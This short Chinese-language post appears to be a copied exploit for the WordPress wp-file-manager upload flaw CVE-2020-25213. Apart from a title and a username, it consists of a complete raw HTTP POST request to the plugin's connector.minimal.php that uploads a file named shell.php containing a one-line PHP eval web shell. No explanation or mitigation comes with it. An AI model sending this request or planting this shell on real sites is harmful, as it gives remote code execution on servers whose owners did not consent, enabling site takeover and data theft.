WordPress wp-file-manager 文件上传漏洞 CVE-2020-25213

彦祖 330
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1
User-Agent: curl/7.88.1
Accept: */*
Content-Length: 424
Content-Type: multipart/form-data; boundary=------------------------52d91370b674307b

--------------------------52d91370b674307b
Content-Disposition: form-data; name="cmd"

upload
--------------------------52d91370b674307b
Content-Disposition: form-data; name="target"

l1_
--------------------------52d91370b674307b
Content-Disposition: form-data; name="upload[]"; filename="shell.php"
Content-Type: application/octet-stream

<?php @eval($_POST[1]);?>
--------------------------52d91370b674307b--

分享